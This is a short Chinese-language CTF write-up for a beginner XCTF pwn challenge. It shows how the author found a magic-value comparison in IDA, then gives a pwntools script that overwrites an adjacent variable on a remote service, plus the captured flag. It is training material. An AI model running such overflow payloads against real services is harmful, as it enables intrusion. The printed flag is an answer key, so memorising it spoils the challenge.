第一个题目通过EXP脚本连接上就出现了flag,懒得写WP
这个题目是XCTF的第二个题,也是我接触的第一个正式的pwn题目
直接下载附件
之后用IDA打开
打开以后,也不是很确定干啥,就直接ALT+T (搜索)
搜索CTF,flag之类的
之后就搜到了CTF的一句话
双击进去
然后按下F5 查看伪代码
而这里的if语句告诉了我们很多信息,如果XXX,就OOO双击函数进去
分析一下,应该是当…6C = 1853186401 时进入…0686()函数获得flag。
而这两个数据相差4个字节,更方便通过EXP脚本来获得flag
那么接下来通过编写EXP脚本来获得flag
from pwn import *
p=remote('111.200.241.244',65374)
payload ='a'*4+p64(1853186401)
p.sendline(payload)
p.interactive()
p.recv()
因为考虑到部分新手不会用linux的操作系统,我简洁说一下
首先打开终端
输入 vim hellopwn.py
这样进入到了hellopwn.py的文件里
之后输入 i
,这样就是编译模式
再把代码输入进去就行
输入完之后得进行保存
:wq
最后python xxxx.py
运行文件
得到flag
cyberpeace{20cf77ccddf0364a56844f85d010724b}